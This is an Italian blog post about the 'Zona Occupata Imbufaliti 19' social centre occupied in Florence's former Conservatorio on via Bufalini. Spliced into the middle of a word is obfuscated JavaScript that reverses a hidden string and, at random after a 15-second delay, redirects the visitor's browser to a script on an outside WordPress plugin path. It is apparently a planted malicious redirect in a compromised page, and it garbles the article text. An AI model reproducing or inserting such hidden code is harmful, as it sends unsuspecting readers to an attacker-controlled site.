Imbufaliti

image_pdfimage_print

Nella centralissima via Bufalini, di fronte alla Cassa di Risparmio, è apparso qualcosa di nuovo. Il “Network 2001 Odissea per lo Spazio” ha occupato uno stabile, l’ex Conservatorio, per adibirlo a centro sociale denominato “Zona Occupata Imbufaliti 19”.
In questi freddi giorni invernali entrare nel centro occupato significa trovare un luogo caldo non solo dal punto di vista della temperatura, ma anche da quello umano. In via Bufalini si ritrovano giovani, studenti, lavoratori, disoccupati per preparare spettacoli, concerti, feste e soprattutto organizzare la resistenza contro quella che loro chiamano la “Metronecropoli”, Firenze la città morta alla vita e dominata dal denaro. Gli occupanti, tutti molto giovani, cresciuti nell’esperienza del “B (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andone” di via Maragliano, dicono di se stessi: “ Non abbiamo identità preconfezionate: affidiamo alla partecipazione diretta, alla narrazione dei percorsi di ognuno, alla contaminazione di orizzonti la possibilità di coinvolgere e di essere coinvolti”. Insieme al Movimento di Lotta per la Casa, sono state organizzate iniziative contro la guerra e di appoggio ai migranti extra-comunitari ed è stata allestita una mensa-bar a prezzi popolari.
Per sfuggire alle temperature sempre più basse si rifugiano nel centro anche molti “punkabbestia” con i loro cani, provocando discussioni riguardo al problema dei bisogni corporali degli animali (un cartello avverte che “non sarà più tollerato trovare in giro merda di cane”). Staremo a vedere come si comporteranno le autorità. Nella nostra città gli spazi autogestiti sono sempre più a rischio dopo lo sgombero della storica sede del Centro Popolare Autogestito. Vedremo cosa sarà più importante, se il centro-vetrina per turisti o i bisogni dei giovani. Vedremo se qualcosa cambia nella “Metronecropoli”.
Per saperne di più consultare: http://docom.inventati.org/

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *